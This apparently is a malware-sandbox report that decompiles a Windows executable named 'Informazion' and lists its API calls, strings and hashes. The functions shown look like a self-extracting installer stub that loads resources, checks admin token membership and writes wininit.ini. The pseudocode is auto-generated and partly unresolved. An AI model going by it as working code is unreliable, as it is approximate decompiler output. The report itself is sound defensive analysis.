Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
Instruction ID: 1c654e50f476df9910211975a588b556062ce25edbbc79c6a5378db4f6eb781e
Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
Instruction Fuzzy Hash: 8A514F32E0CA458AE724AF28E84817D7BA1FB89B54F464132DA7D83794DF3DE564CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5111CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF64C511209
GetProcAddress.KERNEL32 ref: 00007FF64C51122B
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF64C511278
FreeSid.ADVAPI32 ref: 00007FF64C5112A0
FreeLibrary.KERNEL32 ref: 00007FF64C5112AF

Strings

CheckTokenMembership, xrefs: 00007FF64C511221
advapi32.dll, xrefs: 00007FF64C5111FC

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
Instruction ID: c9e8be2e3ccc9c30affd75b00602bc9185aa9714e95d6ea43d61359a74969c1b
Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
Instruction Fuzzy Hash: 6E310F36A0CB458AD614AF1AF4441AEBFA0FB89B90F455136DE5D83714DF3CE155CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C512834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32 ref: 00007FF64C512A44

Part of subcall function 00007FF64C51261C: CharUpperA.USER32 ref: 00007FF64C512662
Part of subcall function 00007FF64C51261C: CharNextA.USER32 ref: 00007FF64C512674
Part of subcall function 00007FF64C51261C: CharNextA.USER32 ref: 00007FF64C512683
Part of subcall function 00007FF64C51261C: RegOpenKeyExA.ADVAPI32 ref: 00007FF64C512724
Part of subcall function 00007FF64C51261C: RegQueryValueExA.ADVAPI32 ref: 00007FF64C51275B
Part of subcall function 00007FF64C51261C: ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF64C512782
Part of subcall function 00007FF64C51261C: RegCloseKey.ADVAPI32 ref: 00007FF64C5127B9

GetFileVersionInfoSizeA.VERSION ref: 00007FF64C5128AC
GlobalAlloc.KERNEL32 ref: 00007FF64C5128C9
GlobalLock.KERNEL32 ref: 00007FF64C5128E4
GetFileVersionInfoA.VERSION ref: 00007FF64C51290C
VerQueryValueA.VERSION ref: 00007FF64C512932
GlobalUnlock.KERNEL32 ref: 00007FF64C5129DC
GlobalUnlock.KERNEL32 ref: 00007FF64C5129F0

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
String ID:
API String ID: 1051330783-0
Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
Instruction ID: 6b1371b3b972e24a02ed1eb488d2892129eebe228017b89f34f4379d862b2dd8
Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
Instruction Fuzzy Hash: A3513531E0C6428AEB18BF1DA8085BC7FA5FB48B94F555132DE2DA3794DE78E4A1C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C512A6C Relevance: 12.1, APIs: 8, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF67FF64C512A6C(long long __rbx, intOrPtr* __rcx, void* __rdx, char* __r8, long long _a32) {
				signed int _v40;
				char _v312;
				void* __rsi;
				int _t19;
				signed long long _t54;
				signed long long _t55;
				char* _t57;
				intOrPtr* _t65;
				void* _t98;
				void* _t99;
				void* _t105;
				signed long long _t106;
				signed long long _t107;

				_a32 = __rbx;
				_t54 =  *0x4c51c008; // 0xdeba5460e397
				_t55 = _t54 ^ _t99 - 0x00000140;
				_v40 = _t55;
				_t98 = __rdx;
				if ( *((char*)(__rcx)) == 0) goto 0x4c512c27;
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t18 =  *__rcx;
				if ( *__rcx == 0) goto 0x4c512c24;
				_t107 = _t106 | 0xffffffff;
				_t19 = IsDBCSLeadByte(??);
				 *__r8 =  *__rcx;
				if (_t19 == 0) goto 0x4c512ae8;
				 *((char*)(__r8 + 1)) =  *((intOrPtr*)(__rcx + 1));
				if ( *((char*)(__rcx)) != 0x23) goto 0x4c512bf6;
				CharNextA(??);
				if (CharUpperA(??) != 0x44) goto 0x4c512b9b;
				E00007FF67FF64C517C40(_t55, __r8,  &_v312,  &_v312, __rdx);
				_t57 = _t107 + 1;
				if ( *((char*)( &_v312 + _t57)) != 0) goto 0x4c512b2d;
				CharPrevA(??, ??);
				if (_t57 == 0) goto 0x4c512b5c;
				if ( *_t57 != 0x5c) goto 0x4c512b5c;
				 *_t57 = 0;
				if (__r8 - _t98 < 0) goto 0x4c512b7e;
				if (__r8 - _t98 - 0x400 > 0) goto 0x4c512b7e;
				goto 0x4c512b80;
				E00007FF67FF64C511008(__r8, _t98 - __r8 + 0x400,  &_v312, _t105);
				if ( *((char*)(__r8 + _t107 + 1)) != 0) goto 0x4c512b90;
				goto 0x4c512bec;
				if (CharUpperA(??) != 0x45) goto 0x4c512bf1;
				if (__r8 - _t98 < 0) goto 0x4c512bd1;
				if (__r8 - _t98 - 0x400 > 0) goto 0x4c512bd1;
				goto 0x4c512bd3;
				E00007FF67FF64C511008(__r8, _t98 - __r8 + 0x400,  &_v312, _t105);
				_t65 = _t107 + 1;
				if ( *((char*)(__r8 + _t65)) != 0) goto 0x4c512be3;
				goto 0x4c512c08;
				if ( *_t55 != 0x23) goto 0x4c512c08;
				CharNextA(??);
				CharNextA(??);
				if ( *_t65 != 0) goto 0x4c512acc;
				 *_t65 = 0;
				return E00007FF67FF64C518470( *_t65, _t18, _v40 ^ _t99 - 0x00000140);
			}

0x7ff64c512a6c
0x7ff64c512a7c
0x7ff64c512a83
0x7ff64c512a86
0x7ff64c512a94
0x7ff64c512a9a
0x7ff64c512aac
0x7ff64c512ab2
0x7ff64c512abe
0x7ff64c512ac2
0x7ff64c512ac8
0x7ff64c512ace
0x7ff64c512adc
0x7ff64c512ae0
0x7ff64c512ae5
0x7ff64c512aeb
0x7ff64c512af4
0x7ff64c512b15
0x7ff64c512b20
0x7ff64c512b2d
0x7ff64c512b34
0x7ff64c512b43
0x7ff64c512b52
0x7ff64c512b57
0x7ff64c512b59
0x7ff64c512b5f
0x7ff64c512b6d
0x7ff64c512b7c
0x7ff64c512b88
0x7ff64c512b97
0x7ff64c512b99
0x7ff64c512bad
0x7ff64c512bb2
0x7ff64c512bc0
0x7ff64c512bcf
0x7ff64c512bdb
0x7ff64c512be3
0x7ff64c512bea
0x7ff64c512bef
0x7ff64c512bf4
0x7ff64c512bf9
0x7ff64c512c0b
0x7ff64c512c1e
0x7ff64c512c24
0x7ff64c512c4a

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF64C512AB2
IsDBCSLeadByte.KERNEL32 ref: 00007FF64C512ACE
CharNextA.USER32 ref: 00007FF64C512AF4
CharUpperA.USER32 ref: 00007FF64C512B07
CharPrevA.USER32 ref: 00007FF64C512B43
CharUpperA.USER32 ref: 00007FF64C512B9F
CharNextA.USER32 ref: 00007FF64C512BF9
CharNextA.USER32 ref: 00007FF64C512C0B

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
String ID:
API String ID: 975904313-0
Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
Instruction ID: 5307320b65182e4113ec8ec9fdb3ac4d6e85428516f771076ffc2ab11dee555d
Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
Instruction Fuzzy Hash: 4551A561E0C6C645FB257F29A8083BDBF91EB4AB94F488172CAAE47785CF3CD5658700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C514C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00007FF64C514C9B
GetWindowRect.USER32 ref: 00007FF64C514CBC
GetDC.USER32 ref: 00007FF64C514CD9
GetDeviceCaps.GDI32 ref: 00007FF64C514CF0
GetDeviceCaps.GDI32 ref: 00007FF64C514D07
ReleaseDC.USER32 ref: 00007FF64C514D20
SetWindowPos.USER32 ref: 00007FF64C514D92

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
Instruction ID: a3c9b4ba396c774ecee73c38bf2048e8d292e115cdbde86e4860358ee21fac63
Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
Instruction Fuzzy Hash: 23318136F289418AE714AF69E8085BD7FB0F749B99F595131CE1A93B48CF3DE4458B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FF67FF64C513F74(long long __rax) {
				signed long long _v16;
				signed long long _v24;
				void* __rbx;
				void* _t13;
				signed int _t14;
				signed int _t18;
				long long _t40;
				void* _t41;
				void* _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t40 = __rax;
				r8d = 0;
				_t13 = E00007FF67FF64C515050(__rax, _t41, "LICENSE", _t49, _t52, _t53);
				_t14 = LocalAlloc(??, ??);
				 *0x4c51d030 = __rax;
				if (__rax != 0) goto 0x4c513fdd;
				_v16 = _v16 & _t14;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC("LICENSE", _t54, _t55, _t57);
				 *0x4c51d544 = E00007FF67FF64C517700();
				goto 0x4c5140b7;
				r8d = _t13;
				_t18 = E00007FF67FF64C515050(_t40, _t41, "LICENSE", _t40, _t52, _t53);
				if (_t18 != 0) goto 0x4c514030;
				_v16 = _v16 & _t18;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC("LICENSE", _t54, _t55, _t57);
				LocalFree(??);
				 *0x4c51d544 = 0x80070714;
				goto 0x4c513fd6;
				if (lstrcmpA(??, ??) == 0) goto 0x4c514098;
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				r8d = 0;
				E00007FF67FF64C517AC8(_t40, _t41, _t52, _t53, _t54, 0x7ff64c5133f0);
				LocalFree(??);
				if (_t40 != 0) goto 0x4c5140ab;
				 *0x4c51d544 = 0x800704c7;
				goto 0x4c513fd6;
				LocalFree(??);
				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
				return 1;
			}

0x7ff64c513f74
0x7ff64c513f7a
0x7ff64c513f86
0x7ff64c513f95
0x7ff64c513fa1
0x7ff64c513fab
0x7ff64c513fad
0x7ff64c513fb1
0x7ff64c513fb4
0x7ff64c513fb7
0x7ff64c513fc6
0x7ff64c513fd0
0x7ff64c513fd8
0x7ff64c513fdd
0x7ff64c513fea
0x7ff64c513ff1
0x7ff64c513ff3
0x7ff64c513ff7
0x7ff64c513ffa
0x7ff64c513ffd
0x7ff64c51400c
0x7ff64c514018
0x7ff64c514024
0x7ff64c51402e
0x7ff64c51404c
0x7ff64c51404e
0x7ff64c51405b
0x7ff64c514061
0x7ff64c514069
0x7ff64c514078
0x7ff64c514087
0x7ff64c514089
0x7ff64c514093
0x7ff64c51409f
0x7ff64c5140ab
0x7ff64c5140bc

APIs

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

LocalAlloc.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C513F95
LocalFree.KERNEL32 ref: 00007FF64C514018

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704

lstrcmpA.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C51403E
LocalFree.KERNEL32(?,?,?,?,?,00007FF64C513139), ref: 00007FF64C51409F

Part of subcall function 00007FF64C517AC8: FindResourceA.KERNEL32 ref: 00007FF64C517AF2
Part of subcall function 00007FF64C517AC8: LoadResource.KERNEL32 ref: 00007FF64C517B09
Part of subcall function 00007FF64C517AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF64C517B3F
Part of subcall function 00007FF64C517AC8: FreeResource.KERNEL32 ref: 00007FF64C517B51

LocalFree.KERNEL32 ref: 00007FF64C514078

Strings

LICENSE, xrefs: 00007FF64C513F7D, 00007FF64C513FE0
<None>, xrefs: 00007FF64C514037

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
Instruction ID: bdc57b25df5fcca419ecebe28dea5d9fa0d0d79e36c0a803df715ae15eb16c5b
Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
Instruction Fuzzy Hash: 92315A36E2D6028AF719BF28E41877D7EA0FB84744F445536D92D86794EF7DA0248600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C51772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64C51114C: _vsnprintf.MSVCRT ref: 00007FF64C511189

LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C51606F), ref: 00007FF64C517763
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C51606F), ref: 00007FF64C517772
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C51606F), ref: 00007FF64C5177B8
FindResourceA.KERNEL32 ref: 00007FF64C5177EC
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C51606F), ref: 00007FF64C517805

Strings

UPDFILE%lu, xrefs: 00007FF64C5177C9

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
Instruction ID: 304c21f5adfabf4e56fb8106025b70fae61585114190bdbe4df5015a3d0e3cf1
Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
Instruction Fuzzy Hash: ED312331E0CA4186E718BF29A40417DBFA1FB89B90F558636DA6E87794DF3CE455C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF64C515078
SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
FindResourceA.KERNEL32 ref: 00007FF64C5150AF
LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
memcpy_s.MSVCRT ref: 00007FF64C5150EE
FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID:
API String ID: 3370778649-0
Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
Instruction ID: 3254f9a761043db7fc58f980f9529cc91c0467c57ea3efd58ebf633ccdd1d39a
Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
Instruction Fuzzy Hash: B6111721B0CB8187EB187F66A84807DBEA1EB4EFD1B899139DE5E83758DF3CD4518600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C512244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF64C512244(long long __rbx, long long _a8) {
				signed int _v24;
				char _v296;
				long _t15;
				signed long long _t34;
				long long _t36;
				void* _t43;
				void* _t44;
				void* _t45;

				_t36 = __rbx;
				_a8 = __rbx;
				_t34 =  *0x4c51c008; // 0xdeba5460e397
				_v24 = _t34 ^ _t45 - 0x00000140;
				if (GetWindowsDirectoryA(??, ??) == 0) goto 0x4c5122eb;
				E00007FF67FF64C517BA8(0x104, _t34 ^ _t45 - 0x00000140, __rbx,  &_v296, _t43, _t44, "wininit.ini");
				r8d = 0;
				WritePrivateProfileStringA(??, ??, ??, ??);
				if (_lopen(??, ??) == 0xffffffff) goto 0x4c5122eb;
				_t8 = _t36 + 2; // 0x2
				r8d = _t8;
				_t15 = _llseek(??, ??, ??);
				_lclose(??);
				return E00007FF67FF64C518470(_t15, _t14, _v24 ^ _t45 - 0x00000140);
			}

0x7ff64c512244
0x7ff64c512244
0x7ff64c512251
0x7ff64c51225b
0x7ff64c51227f
0x7ff64c51228f
0x7ff64c512299
0x7ff64c5122a0
0x7ff64c5122c5
0x7ff64c5122c9
0x7ff64c5122c9
0x7ff64c5122cf
0x7ff64c5122df
0x7ff64c51230d

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF64C512271
WritePrivateProfileStringA.KERNEL32 ref: 00007FF64C5122A0
_lopen.KERNEL32 ref: 00007FF64C5122B4
_llseek.KERNEL32 ref: 00007FF64C5122CF
_lclose.KERNEL32 ref: 00007FF64C5122DF

Strings

wininit.ini, xrefs: 00007FF64C512281

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
Instruction ID: 2e44b59144dfa2986543f40eb831a1f7233ab007946d692f6a7b106ddbe6d778
Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
Instruction Fuzzy Hash: 9C112132A08A4187D714BF29E8582BD7BA1FBCD714F858132DA6D83758DF3CD559C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF64C513840(void* __edx, void* __eflags, void* __rax, void* __rcx, void* __r8) {
				void* __rbx;
				void* _t31;

				if (__eflags == 0) goto 0x4c5138e7;
				if (__eflags == 0) goto 0x4c51388e;
				if (__edx - 0xffffffffffffff10 == 1) goto 0x4c513866;
				goto 0x4c5138fd;
				if (__r8 - 6 < 0) goto 0x4c5138f8;
				if (__r8 - 7 <= 0) goto 0x4c513889;
				if (__r8 != 0x839) goto 0x4c5138f8;
				 *0x4c51d600 = 1;
				goto 0x4c5138ec;
				GetDesktopWindow();
				E00007FF67FF64C514C68(__r8 - 0x839, __rcx, __rcx, __rax, __r8, _t31);
				SetWindowTextA(??, ??);
				SetDlgItemTextA(??, ??, ??);
				SetForegroundWindow(??);
				goto 0x4c5138f8;
				EndDialog(??, ??);
				return 1;
			}

0x7ff64c51384c
0x7ff64c513858
0x7ff64c51385d
0x7ff64c513861
0x7ff64c51386a
0x7ff64c513874
0x7ff64c51387d
0x7ff64c51387f
0x7ff64c51388c
0x7ff64c51388e
0x7ff64c5138a0
0x7ff64c5138af
0x7ff64c5138ca
0x7ff64c5138d9
0x7ff64c5138e5
0x7ff64c5138ec
0x7ff64c513902

APIs

GetDesktopWindow.USER32 ref: 00007FF64C51388E
SetWindowTextA.USER32 ref: 00007FF64C5138AF
SetDlgItemTextA.USER32 ref: 00007FF64C5138CA
SetForegroundWindow.USER32 ref: 00007FF64C5138D9
EndDialog.USER32 ref: 00007FF64C5138EC

Strings

Maintal, xrefs: 00007FF64C5138A5

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Window$Text$DesktopDialogForegroundItem
String ID: Maintal
API String ID: 761066910-1608070445
Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
Instruction ID: 6e6cc51a147f62588627238353ebafb0c661022a20cf9f975c0811f9ab5d47f7
Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
Instruction Fuzzy Hash: 071130A0E0D64296F75C3F5DA41C2BC6E51EF8AB41F859132C86E96395DF3CE4A4C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C51494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF67FF64C51494C(void* __rax, long long __rbx, void* __rdx, long long _a8) {
				signed int _v16;
				intOrPtr _v24;
				void* _t13;
				signed int _t14;
				signed int _t16;
				void* _t35;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t52;
				void* _t53;

				_t33 = __rax;
				_a8 = __rbx;
				r8d = 0;
				_t13 = E00007FF67FF64C515050(__rax, __rbx, "FINISHMSG", __rdx, _t45, _t46);
				_t14 = LocalAlloc(??, ??);
				_t35 = __rax;
				if (__rax != 0) goto 0x4c5149a9;
				_v16 = _v16 & _t14;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC("FINISHMSG", _t50, _t52, _t53);
				goto 0x4c514a1d;
				r8d = _t13;
				_t16 = E00007FF67FF64C515050(_t33, _t35, "FINISHMSG", _t35, _t45, _t46);
				if (_t16 != 0) goto 0x4c5149d5;
				_v16 = _v16 & _t16;
				r8d = 0;
				_v24 = 0x10;
				goto 0x4c514a04;
				if (lstrcmpA(??, ??) == 0) goto 0x4c514a0e;
				_v16 = _v16 & 0x00000000;
